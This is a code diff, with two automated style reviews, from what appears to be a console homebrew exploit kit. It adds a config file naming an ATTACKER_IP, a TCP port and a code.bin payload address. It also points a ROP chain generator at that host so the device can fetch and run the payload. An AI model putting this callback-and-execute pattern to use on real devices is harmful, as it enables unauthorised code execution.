diff --git a/homebrew/config.py b/homebrew/config.py
new file mode 100644
index 0000000..de73a4f
--- /dev/null
+++ b/homebrew/config.py
@@ -0,0 +1,6 @@
+ATTACKER_IP = [192, 168, 178, 161] # IP of the device which runs the python scripts
+TCP_SERVER_PORT = 12345 # A free usable port on the attacking device
+
+CODE_BIN_PATH = 'code.bin' # Path to the code.bin payload that will be executed
+CODE_BIN_TARGET_ADDR = 0x011DE200 # Address where the payload should be copied to
+CODE_BIN_ENTRYPOINT = CODE_BIN_TARGET_ADDR # Absolute address of the entrypoint of the copied payload
diff --git a/homebrew/generate_payload.py b/homebrew/generate_payload.py
index f93285d..6b3d78d 100644
--- a/homebrew/generate_payload.py
+++ b/homebrew/generate_payload.py
@@ -1,7 +1,8 @@
 from tcp_ropchain import *
+from config import *
 import struct
 
-rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, [192,168,178,89], 12345)
+rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, ATTACKER_IP, TCP_SERVER_PORT)
 
 with open('payload.s', 'w') as f:
     for val in rop_chain:
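Review bot: `CODE_BIN_PATH = 'code.bin'` is a bare relative path, so it resolves against whatever working directory the scripts are launched from rather than the directory holding config.py; a reader editing this file cannot tell that from the trailing comment. Either anchor it at the script's location, `CODE_BIN_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'code.bin')`, or extend the comment to `# Path to the code.bin payload, relative to the current working directory`. The new module also lacks a docstring; a one-line summary at the top saying these are the user-editable settings shared by the generate_payload and server scripts would help, and `ATTACKER_IP` could note in its comment that it is four integer octets rather than a dotted string, since nothing in this file validates the shape.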
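Review bot: The new `from config import *` line pulls every name in config into this module unqualified, which hides where `ATTACKER_IP` and `TCP_SERVER_PORT` come from and will silently shadow any same-named local if config grows; prefer `from config import ATTACKER_IP, TCP_SERVER_PORT`. The rewritten `rop_chain = tcp_thread_ropchain(...)` call also leaves `0x4D070000 + 0x14` as an unnamed literal while the IP and port were moved to config, which is inconsistent with the commit's own intent — giving that expression a named constant in config (its meaning is not visible in this hunk, so the name should come from the author) would complete the extraction. The `with open('payload.s', 'w')` block continues past the end of the hunk.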